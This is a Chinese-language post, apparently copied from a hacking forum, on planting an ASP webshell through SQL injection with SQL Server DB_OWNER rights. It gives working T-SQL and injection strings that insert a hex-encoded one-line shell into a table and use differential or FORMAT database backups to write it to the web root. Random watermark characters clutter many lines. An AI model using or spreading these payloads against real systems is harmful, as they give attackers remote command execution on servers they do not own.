DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
2 w8 K$ s" `0 Z4 m3 R% u1 `, p
" d# Q; ^" v# v$ `5 o) `减少备份文件大小，得到可执行的webshell成功率提高不少
% B$ ^6 C7 W: f0 J6 I7 Q一利用差异备份
4 |3 |. @% N+ ?  @- u, J/ G" w  s加一个参数WITH DIFFERENTIAL
. n# M: l$ ~- a$ Z
1
* `( z: m( j9 f2
: j' [6 i7 U, O) R; ^& U: d3
4
+ z' o- m5 i# p+ e( o- I, w' _* G declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
# n& A0 S( f3 e4 t* dcreate table [dbo].[xiaolu] ([cmd] [image]);
* s6 I8 w; R  b+ K) M' Y1 k( I" qinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( H) {% |% o" T0 ]- R% pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
2 u% {7 r' R6 N& D* P加一个参数WITH FROMAT
, x$ z2 [9 r4 U有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

, m3 n: q9 F- Y4 T1
2 V8 q' x/ E4 P8 f: g2
9 N7 ], H! ?& n3
' }/ Y; S7 `5 M) v+ ~4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
& e1 f. e+ O6 ycreate table [dbo].[xiaolu] ([cmd] [image]);
* J1 F& q  f3 s% l5 |: c; zinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 N# r. ]% f* a( E/ ~declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
" s1 g2 V; e! Z8 h' C2 r* C
总的来说就是那么简单几句,下面以备份数据库model为例子
6 X7 b4 Z' i9 j( X1
/ W% p( Y  `, d, G7 V. G
- U0 W. ~  Z7 h# ^4 U- c2 R& D1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
  c5 }) E% _' L. S/ ]  X
9 O% I5 @; M+ }  v1 D2

' a+ B. J8 u* ?) C! M% A3 `7 y  g; R1
id=1;backup database model to disk='你的路径‘ with differential,format;--